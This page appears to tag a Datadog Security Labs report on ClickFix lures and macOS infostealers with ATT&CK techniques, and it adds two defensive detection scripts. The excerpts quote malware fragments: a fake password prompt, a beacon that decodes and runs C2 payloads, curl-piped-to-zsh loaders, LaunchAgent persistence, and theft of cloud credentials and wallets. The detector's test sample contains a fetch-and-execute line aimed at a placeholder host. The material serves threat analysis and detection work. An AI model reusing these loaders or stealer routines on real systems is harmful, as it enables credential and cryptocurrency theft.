TTPwire Vol. 1 · MITRE ATT&CK·Tagged

Datadog Security Labs

Tech impersonators: ClickFix and macOS infostealers

2026-02-10

ATT&CK techniques detected

26 predictions
T1555.003 Credentials from Web Browsers
99%
“enter password for continue." default answer "" with icon imagepath buttons {"continue"} default button "continue" giving up after 150 with title "system preferences" with hidden answer The infostealer traverses the filesystem and targets common documents and extensions…”
T1543.001 Launch Agent
95%
“…36@hotmail.com duckymotby82 fulos5 Fake application repositories: github.com/datadog-desktop-app github.com/atera-mac/.github github.com/3commas-app/.github github.com/app-deploy-inst/.github github.com/quadency-pro File paths (persistenc…”
T1204.004 Malicious Copy and Paste
94%
“ClickFix technique aligns with this model by shifting the execution decision to the victim through user-mediated command execution (copy/paste into PowerShell/Run on Windows or Terminal on macOS), often framed as a "verification" or "fix" step. This tradecraft reduces…”
T1059.004 Unix Shell
93%
“resp" | sed -n 's/.*"code":"\([^"]*\)".*/\1/p') if [ -n "$code" ]; then echo "$code" | base64 -d > /tmp/.c.sh && chmod +x /tmp/.c.sh && /tmp/.c.sh; rm -f /tmp/.c.sh fi This script beacons to the C2 server every 60 seconds…”
T1204.001 Malicious Link
91%
“your Google Apps Script web app URL (/exec) const app_url = "https://script.google[.]com/macros/s/akfycbwip_vgpeumbxewux_oex6huimhfpxidiwehphr-fguqiqpcr-mamahc1jcuqyjne3n0q/exec"; // delay after 100% until redirect (ms) const redirect_delay…”
T1204.004 Malicious Copy and Paste
89%
“…The URL structure includes campaign tracking parameters, offer and shortlink, that identify the GitHub repository lure and traffic redirect source: hxxps://drmcdermottmd[.]com/salt-engine.html?offer=datadog&shortlink=q5vbjgvh&c=download_app&pid=mac…”
T1555.003 Credentials from Web Browsers
89%
“…fox-based browsers. Notably, given the campaign's focus on technology-company branding, the infostealer targets cloud and developer-adjacent artifacts, including SSH material, AWS credentials, Kubernetes config, and shell history: on cloudkeys(writemind) try do shel…”
T1560.001 Archive via Utility
86%
“zip /tmp/atomic_asar.zip /tmp/ledger_asar.zip /tmp/ledger_live_asar.zip /tmp/trezor_asar.zip /tmp/app.asar SHA256 stealer file hashes Shub stealer v2.0 9191101893e419eac4be02d416e4eed405ba2055441f36e564f09c19cb26271c”
T1204.004 Malicious Copy and Paste
85%
“…9pbxblci1zdhjsazuuy29tl2xvywrlci5zad9idwlszd1jnmezzwexmjnkotbkmze1nzllymjkmzazmwe1mgfkmq==' | base64 -d) | zsh After displaying a fake download URL, the command decodes a base64-encoded command-and-control URL, downloads the script with curl, and pipes it directly to…”
T1059.004 Unix Shell
84%
“/loader.sh?build={build_id} /payload.applescript?build={build_id} /curl/{build_id}/gate - exfiltration endpoint; /api/bot/heartbeat - persistence beaconing endpoint; /exodus-asar - trojanized Exodus wallet; /atomic-asar - trojanized Atomic walle…”
T1056.002 GUI Input Capture
78%
“dscl . -authonly) - a common credential validation technique used by macOS infostealers. - A controlled retry loop with explicit bounds (maxattempts = 10) - Escalating error text after repeated failures ("incorrect password… (n/10)") - Use of a native system icon (lock…”
T1543.001 Launch Agent
74%
“…r & "GoogleUpdate.app/Contents/MacOS/" set plistdir to (POSIX path of (path to home folder)) & "Library/LaunchAgents/" do shell script "mkdir -p " & quoted form of appdir do shell script "mkdir -p " & quoted form of plistdir set scriptpath to appdir & "goo…”
T1059.002 AppleScript
73%
“osascript (AppleScript interpreter). This is consistent with an execution flow where the next stage is a payload delivered over the network and executed via AppleScript without writing the script itself to disk. We assess this may reduce on-disk artifacts and evade file-bas…”
T1059.002 AppleScript
73%
“") end try MacSync concludes with a routine to target installed cryptocurrency wallet applications (e.g., Ledger/Ledger Live). If the wallet is present under /Applications, the AppleScript downloads a zip payload from securityfenceandwelding[.]com, extracts replacement…”
T1204.002 Malicious File
58%
“Tech impersonators: ClickFix and macOS infostealers Key points and observations - Datadog identified an active campaign employing fake GitHub repositories impersonating software companies and leveraging the ClickFix initial access technique to social-engineer victims into inst…”
T1204.001 Malicious Link
55%
“…The URL structure includes campaign tracking parameters, offer and shortlink, that identify the GitHub repository lure and traffic redirect source: hxxps://drmcdermottmd[.]com/salt-engine.html?offer=datadog&shortlink=q5vbjgvh&c=download_app&pid=mac…”
T1074.001 Local Data Staging
53%
“"profile/.bash_history") readwrite(profile & "/.gitconfig", writemind & "profile/.gitconfig") Beyond typical browser and file collection, MacSync also includes a routine that attempts to collect data from Apple Notes databases: try readwrite(profile & "/libr…”
T1204.002 Malicious File
52%
“ClickFix technique aligns with this model by shifting the execution decision to the victim through user-mediated command execution (copy/paste into PowerShell/Run on Windows or Terminal on macOS), often framed as a "verification" or "fix" step. This tradecraft reduces…”
T1204.001 Malicious Link
47%
“…r-mamahc1jcuqyjne3n0q/exec redirects to ClickFix page: pmacos.onelink[.]me/m5yy/q5vbjgvh pwin.onelink[.]me/zmfc/dt38769z ClickFix domains: drmcdermottmd[.]com hci-outdoors[.]com warboardgame[.]com - Windows download page tiptopmarine[.]com sk…”
T1555.003 Credentials from Web Browsers
44%
“") end try MacSync concludes with a routine to target installed cryptocurrency wallet applications (e.g., Ledger/Ledger Live). If the wallet is present under /Applications, the AppleScript downloads a zip payload from securityfenceandwelding[.]com, extracts replacement…”
T1566.002 Spearphishing Link
41%
“Redirect chain Once a victim clicks the download link in the impersonating repository, they're redirected to a staging site hosted via GitHub Pages. This webpage mimics a GitHub interface, complete with loading progress bar and commit graph animations. This convincing social-…”
T1204.001 Malicious Link
40%
“months, this monitoring identified multiple malicious GitHub repositories masquerading as legitimate desktop applications, including a repository themed as a "Datadog desktop app". hxxps://github[.]com/datadog-desktop-app These impersonating repositories lack the a…”
T1608.005 Link Target
36%
“months, this monitoring identified multiple malicious GitHub repositories masquerading as legitimate desktop applications, including a repository themed as a "Datadog desktop app". hxxps://github[.]com/datadog-desktop-app These impersonating repositories lack the a…”
T1059.007 JavaScript
36%
“osascript (AppleScript interpreter). This is consistent with an execution flow where the next stage is a payload delivered over the network and executed via AppleScript without writing the script itself to disk. We assess this may reduce on-disk artifacts and evade file-bas…”
T1005 Data from Local System
35%
“, "xls", "xlsx", "json", "rdp"} Shub's file grabber is also more controlled. In an attempt to reduce noise, it: - searches only common user folders (Desktop, Documents, Downloads), - limits recursion (-maxdepth 2), - limits file size (-size -5M), - caps how m…”
T1005 Data from Local System
35%
“…son/rdp) are consistent with targeting users who work with exports, reports, internal datasets, and remote access. Combined with the absence of explicit ~/.ssh, ~/.aws, and ~/.kube grabs, this suggests Shub is broadening beyond a "developer workstation" profile towar…”
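The T1204.004 entries above describe the ClickFix command shape: a decoy download URL is echoed, a base64 literal decodes to the command-and-control URL, curl fetches a script and pipes it straight into zsh. The script below is an added example written for this page, not Datadog's code and not anything from the campaign. It pulls a pasted command apart and names the indicators it finds, so a help-desk or SOC analyst can triage a "fix" command before anyone runs it. The two sample commands are constructed; the hosts in them (example.invalid, github.com/example-org) are placeholders, and the indicator names are this example's own.

```python
"""Triage a pasted ClickFix-style command before it is run (added example)."""
import base64
import binascii
import re
from dataclasses import dataclass, field

# A run of >=16 base64 characters with optional padding, not glued to other base64 text.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{16,}={0,2})(?![A-Za-z0-9+/=])")
URL_RE = re.compile(r"https?://[^\s'\"<>|;)]+", re.IGNORECASE)
# "... | zsh", "| sh", "| bash", "| osascript": the fetched payload never touches disk.
PIPE_TO_INTERP_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:zsh|bash|sh|osascript|python3?|perl)\b")
B64_DECODE_RE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")   # GNU and macOS flag spellings
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
# Hidden dropper paths such as /tmp/.c.sh, including the /private and /var/tmp variants.
HIDDEN_TMP_RE = re.compile(r"/(?:private/)?(?:tmp|var/tmp)/\.[A-Za-z0-9_.-]+")


@dataclass
class Triage:
    decoded_strings: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    indicators: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.indicators)


def decode_b64_literals(text: str) -> list:
    """Return every base64 literal in `text` that decodes to printable UTF-8."""
    found = []
    for match in B64_RE.finditer(text):
        token = match.group(1)
        token += "=" * (-len(token) % 4)           # tolerate stripped padding
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue                                # an ordinary long word, not base64
        if decoded.isprintable():
            found.append(decoded)
    return found


def triage_command(cmd: str) -> Triage:
    """Score one pasted command; indicators are named strings, an empty list means clean."""
    result = Triage(decoded_strings=decode_b64_literals(cmd))
    for source in [cmd, *result.decoded_strings]:   # URLs in the clear and URLs hidden in base64
        for url in URL_RE.findall(source):
            if url not in result.urls:
                result.urls.append(url)
    if PIPE_TO_INTERP_RE.search(cmd):
        result.indicators.append("pipe-to-interpreter")
    if B64_DECODE_RE.search(cmd):
        result.indicators.append("base64-decode")
    if FETCH_RE.search(cmd) and PIPE_TO_INTERP_RE.search(cmd):
        result.indicators.append("fetch-and-execute")
    if any(URL_RE.search(s) for s in result.decoded_strings):
        result.indicators.append("url-hidden-in-base64")
    if HIDDEN_TMP_RE.search(cmd):
        result.indicators.append("hidden-tmp-dropper")
    return result


# Constructed sample in the shape the page describes: a decoy download URL is
# echoed, then a base64-encoded loader URL is decoded, fetched and piped to zsh.
_ENCODED_C2 = base64.b64encode(b"https://example.invalid/loader.sh?build=test").decode()
SAMPLE_CLICKFIX = (
    'echo "Download: https://github.com/example-org/example-desktop-app/releases"; '
    f"curl -fsSL \"$(echo '{_ENCODED_C2}' | base64 -d)\" | zsh"
)
# Constructed benign command for contrast: a plain clone and install.
SAMPLE_BENIGN = (
    "git clone https://github.com/example-org/example-desktop-app.git "
    "&& cd example-desktop-app && npm install"
)

if __name__ == "__main__":
    for sample in (SAMPLE_CLICKFIX, SAMPLE_BENIGN):
        verdict = triage_command(sample)
        print("SUSPICIOUS" if verdict.suspicious else "clean", verdict.indicators, verdict.urls)
```

Decoding the base64 literal is the step that matters: the pasted text shows the victim a plausible GitHub URL, and the actual loader host only appears after decoding, which is also where an analyst gets a domain to block.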

Summary

Datadog identified an active campaign employing fake GitHub repositories impersonating software companies and leveraging the ClickFix initial access technique to deliver macOS infostealers.
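The T1543.001 entries show the persistence step: an AppleScript creates a vendor-lookalike "GoogleUpdate.app" directory and a plist under ~/Library/LaunchAgents/. The script below is an added example written for this page, not Datadog's code and not the campaign's. It assesses LaunchAgent plists for the traits of that pattern: a payload under a user-writable path, launch through an interpreter, and a restart or interval setting that keeps a beacon alive. The two plists are constructed; the label, user name and script name in them are hypothetical, as are the finding names and the list of user-writable prefixes (a heuristic, not an exhaustive set).

```python
"""Hunt heuristics for macOS LaunchAgent persistence (added example)."""
import os
import plistlib
import posixpath
import re
from glob import glob
from xml.parsers.expat import ExpatError

INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python", "python3", "perl", "curl"}
# Locations an unprivileged user can write to (heuristic, not exhaustive).
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
FETCH_OR_PIPE_RE = re.compile(r"\b(?:curl|wget)\b|\|\s*(?:sh|zsh|bash|osascript)\b")


def program_of(plist: dict) -> str:
    args = plist.get("ProgramArguments") or []
    return plist.get("Program") or (args[0] if args else "")


def assess_launch_agent(plist_bytes: bytes) -> dict:
    """Parse one plist and return its label, program and a list of named findings."""
    try:
        plist = plistlib.loads(plist_bytes)
    except (plistlib.InvalidFileException, ExpatError, ValueError):
        return {"label": "", "program": "", "findings": ["unparseable"]}
    args = [str(a) for a in (plist.get("ProgramArguments") or [])]
    program = program_of(plist)
    findings = []
    if posixpath.basename(program) in INTERPRETERS:
        findings.append("interpreter-launch")        # the real payload is in the arguments
    targets = [program, *args[1:]]
    if any(t.startswith(USER_WRITABLE_PREFIXES) for t in targets):
        findings.append("user-writable-payload-path")
    if any(re.search(r"/\.[^/]+", t) for t in targets):
        findings.append("hidden-path-component")     # /tmp/.c.sh style droppers
    if plist.get("StartInterval") or plist.get("KeepAlive"):
        findings.append("keepalive-or-interval")     # relaunch or periodic run: beacon shape
    if FETCH_OR_PIPE_RE.search(" ".join(args)):
        findings.append("inline-fetch-or-pipe")
    return {"label": str(plist.get("Label", "")), "program": program, "findings": findings}


def hunt_directory(directory: str) -> list:
    """Assess every *.plist in `directory`; returns one dict per file with its path."""
    report = []
    for path in sorted(glob(os.path.join(directory, "*.plist"))):
        with open(path, "rb") as fh:
            entry = assess_launch_agent(fh.read())
        entry["path"] = path
        report.append(entry)
    return report


# Constructed plist in the shape the page describes (hypothetical label, user
# name and script name): an interpreter runs a script parked inside a
# vendor-lookalike ".app" directory under the user's home, every 60 seconds.
MALICIOUS_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.googleupdate</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/osascript</string>
    <string>/Users/alice/Library/Application Support/GoogleUpdate.app/Contents/MacOS/update_agent.scpt</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>60</integer>
</dict></plist>"""

# Constructed benign agent for contrast: an app's own helper launched from /Applications.
BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/ExampleBackup.app/Contents/MacOS/ExampleBackup</string>
    <string>--agent</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for entry in hunt_directory(os.path.expanduser("~/Library/LaunchAgents")):
        if entry["findings"]:
            print(entry["path"], entry["label"], entry["findings"])
```

Run on a host, the script only prints agents with at least one finding; a vendor-sounding label is deliberately not a finding on its own, since legitimate updaters use such labels, while an interpreter launching a script from under the home directory with a StartInterval is the combination worth a second look.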